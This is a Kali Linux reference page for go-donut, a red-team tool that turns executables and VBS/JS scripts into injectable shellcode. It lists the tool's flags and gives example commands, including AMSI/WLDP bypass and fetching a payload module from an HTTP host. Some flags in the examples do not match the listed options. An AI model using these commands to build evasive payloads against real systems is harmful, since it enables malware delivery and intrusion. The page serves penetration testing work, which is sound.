Exploitationdonutinjectorshellcodegopedotnetvbsjs

go-donut

go-donut is a pure Go implementation of the Donut Injector that converts VBS/JS or PE/.NET EXE/DLL files into shellcode. It generates the binary go-donut from the github-binject-go-donut package.

Description

The golang-github-binject-go-donut package provides the Donut Injector ported to pure Go, enabling the creation of shellcode from various executable formats. This tool is useful for generating position-independent shellcode for injection purposes in red teaming and penetration testing scenarios. The binary go-donut is the primary interface for users to perform these conversions.

Key features include support for entropy obfuscation, architecture selection, AMSI/WLDP bypass options, and output in multiple formats. It handles PE and .NET binaries as well as VBS/JS scripts, making it versatile for creating payloads that can be hosted via HTTP or embedded directly.

The package also includes a development variant with Go source code for custom builds or extensions. Installation is straightforward via Kali's package manager.

How It Works

go-donut processes input files (VBS/JS, PE EXE/DLL, .NET assemblies) and generates shellcode using Donut's techniques for position-independent execution. It applies entropy (random names, symmetric encryption), compresses payloads, supports module loading from HTTP servers, and includes AMSI/WLDP evasion. Output formats include raw shellcode, which can be injected into target processes across x86/x64 architectures.

Installation

bash

sudo apt install golang-github-binject-go-donut

Flags

-h, --helpPrint help information

-n, --moduleModule name. Randomly generated by default with entropy enabled.

-u, --urlHTTP server that will host the donut module.

-e, --entropyEntropy. 1=disable, 2=use random names, 3=random names + symmetric encryption (default). Default: 3

-a, --archTarget Architecture: x32, x64, or x84. Default: x84

-b, --bypassBypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail

-o, --outOutput file

-f, --formatOutput format

-i, --inInput file (required)

-v, --verboseVerbose output

Examples

Prints the full help information and usage details for the tool.

go-donut -h

Converts a PE EXE to x64 shellcode with default entropy (random names + encryption).

go-donut -i input.exe -o output.bin -a x64 -e 3

Converts a VBS script to shellcode hosted from an HTTP server module.

go-donut -i script.vbs -o shellcode.bin -u http://example.com/module.dll

Converts a DLL with AMSI/WLDP bypass (continue on fail) in raw shellcode format.

go-donut -i app.dll -o payload.bin -b 3 -f 1

Converts a .NET EXE to x86 shellcode with random names entropy and verbose output.

go-donut -i netapp.exe -o out.bin -a x86 -e 2 -v

Converts a JS file to compressed shellcode with custom module name.

go-donut -i jsfile.js -o shell.bin -n mymodule -z 1

Updated 2026-04-16kali.org ↗